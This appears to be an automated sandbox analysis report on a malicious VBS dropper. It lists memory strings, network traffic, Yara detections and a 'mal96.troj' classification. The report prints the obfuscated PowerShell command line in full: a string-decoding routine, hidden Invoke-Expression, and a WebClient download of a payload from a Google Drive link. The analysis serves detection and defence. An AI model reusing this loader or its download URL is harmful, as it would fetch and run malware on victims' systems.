            Source: wscript.exe, 00000000.00000003.1396911986.0000023820D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
            Source: wscript.exe, 00000000.00000003.1400142535.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399158450.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397110745.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1401468590.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398700800.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399639000.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397554662.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398166574.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400548820.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400962270.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398485056.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398375334.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398592474.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1392197030.0000023820DC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397416560.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400990850.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400513979.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1399106896.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1397821425.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1398997557.0000023820DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1400063078.0000023820DE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d145861cc9
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E578C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
            Source: powershell.exe, 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E3981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2662155964.0000000005081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E3981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000D.00000002.2662155964.0000000005081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.g
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.go
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goo
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goog
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E574F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googl
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.c
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.co
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E3DEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E56F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?e
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?ex
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?exp
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expor
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=d
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=do
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=down
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downlo
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&i
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1X
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Xw
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwI
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIR
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRr
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrE
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEg
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgt
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8e
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQ
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQU
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUi
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUie
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZ
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Q
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9k
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kk
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Q
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6a
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6ai
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6ais
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx
            Source: powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisxXRgl
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx&export=download
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E3E49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.comh
            Source: powershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E4C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5752000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5752000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56536
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56535
            Source: unknownNetwork traffic detected: HTTP traffic on port 56535 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56536 -> 443
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.8:56535 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.8:56536 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi32_3552.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 1296, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3552, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4672
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 4672
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 4672Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AE7C3299_2_00007FFB4AE7C329
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFB4AE7B5799_2_00007FFB4AE7B579
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0500F1F013_2_0500F1F0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0500FAC013_2_0500FAC0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0500EEA813_2_0500EEA8
            Source: 2669976595_366408723_KHI_SOF_240702_0957_P.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi32_3552.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 1296, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3552, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal96.troj.expl.evad.winVBS@9/7@2/2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Noncongestion.ForJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1612:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lf4slyuy.rhq.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1296
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3552
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs"
